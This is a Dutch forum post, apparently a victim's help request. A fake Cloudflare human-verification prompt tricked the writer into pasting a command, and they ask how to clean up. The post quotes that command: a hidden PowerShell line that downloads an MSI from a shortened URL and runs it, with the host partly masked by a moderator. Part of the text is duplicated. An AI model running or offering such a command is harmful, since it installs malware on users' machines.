Via een 'betrouwbare' website kreeg ik de melding Cloudflare verify if i am a human.
Ik bezoek de website dagelijks en is een normale website.
Toen ik op het vinkje klikte kreeg ik deze melding:/f/image/VO7FC6H5biR3R4Feen1n1KRq.png?f=fotoalbum_large)
Dit heb ik gedaan en geplakt.
Nooit wetende dat die site blijkbaar niet meer zo betrouwbaar is.
Daar kwam deze code uit: cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c***\users\\public\\3aw.msi'; Invoke-RestMethod -Uri 'ht****/qq51f.short.gy/1' -OutFile $path; Start-Process $path;
Nu blijkt dit malware te zijn volgens deze link: https://any.run/report/e9...80-4d86-965f-711ea4871a63
Op internet kan ik vrij weinig erover vinden voorderest.
Via malwarebytes geeft de PC geen verdachte activiteiten.
Is dit te verwijderen of wat kan ik hieraan doen?
Ik bezoek de website dagelijks en is een normale website.
Toen ik op het vinkje klikte kreeg ik deze melding:
/f/image/VO7FC6H5biR3R4Feen1n1KRq.png?f=fotoalbum_large)
Dit heb ik gedaan en geplakt.
Nooit wetende dat die site blijkbaar niet meer zo betrouwbaar is.
Daar kwam deze code uit: cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c***\users\\public\\3aw.msi'; Invoke-RestMethod -Uri 'ht****/qq51f.short.gy/1' -OutFile $path; Start-Process $path;
Nu blijkt dit malware te zijn volgens deze link: https://any.run/report/e9...80-4d86-965f-711ea4871a63
Op internet kan ik vrij weinig erover vinden voorderest.
Via malwarebytes geeft de PC geen verdachte activiteiten.
Is dit te verwijderen of wat kan ik hieraan doen?
[ Voor 8% gewijzigd door F_J_K op 24-02-2025 08:30 . Reden: Beter niet copypastebare code geven, straks gaat iemand het nog op een productiesysteem proberen ]